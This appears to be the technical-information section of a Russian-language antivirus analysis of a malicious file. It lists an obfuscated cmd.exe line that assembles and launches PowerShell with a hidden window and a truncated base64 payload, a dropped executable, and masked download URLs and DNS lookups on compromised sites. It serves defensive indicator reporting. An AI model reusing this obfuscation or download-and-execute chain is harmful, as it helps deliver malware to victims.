Техническая информация
- '<SYSTEM32>\cmd.exe' /V /C "set %iBJAocSjr%=hXaOhiJhj&&set %ibNddFbvR%=p^o^we^rs&&set %zbGGUIFbM%=VKCbjqFrt&&set %ljtiGsZuh%=he^ll&&set %YzJTkmPcz%=alBORwlwo&&!%ibNddFbvR%!!%ljtiGsZuh%! ^-^e LQBKAE8AaQBuACgAKAAgADM...
- %TEMP%\60479.exe
- %TEMP%\60479.exe
- 'pu####odukties.nl':80
- 'br###e-loehr.de':80
- 'br###e-loehr.de':443
- 'bj#.de':80
- 'vi####am-gmbh.de':80
- 'wl##i.net':80
- http://pu####odukties.nl/RMauWGgE/
- http://br###e-loehr.de/mkFRFHF/
- http://bj#.de/sUku/
- http://vi####am-gmbh.de/esohmhCZa/
- http://wl##i.net/NvoHkFXZe/
- 'br###e-loehr.de':443
- DNS ASK pu####odukties.nl
- DNS ASK br###e-loehr.de
- DNS ASK bj#.de
- DNS ASK vi####am-gmbh.de
- DNS ASK wl##i.net
- '<SYSTEM32>\cmd.exe' /V /C "set %iBJAocSjr%=hXaOhiJhj&&set %ibNddFbvR%=p^o^we^rs&&set %zbGGUIFbM%=VKCbjqFrt&&set %ljtiGsZuh%=he^ll&&set %YzJTkmPcz%=alBORwlwo&&!%ibNddFbvR%!!%ljtiGsZuh%! ^-^e LQBKAE8AaQBuACgAKAAgADM...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LQBKAE8AaQBuACgAKAAgADMANgAgACwAIAAxADEAOQAsADEAMQA1ACAALAAgADkAOQAsADEAMQA0ACwAMQAwADUALAAxADEAMgAgACwAMQAxADYAIAAsADMAMgAsACAANgAxACwAMwAyACwAMQAxADAAIAAsACAAMQAwADEALAAxADEAOQAgACwAIAA0AD...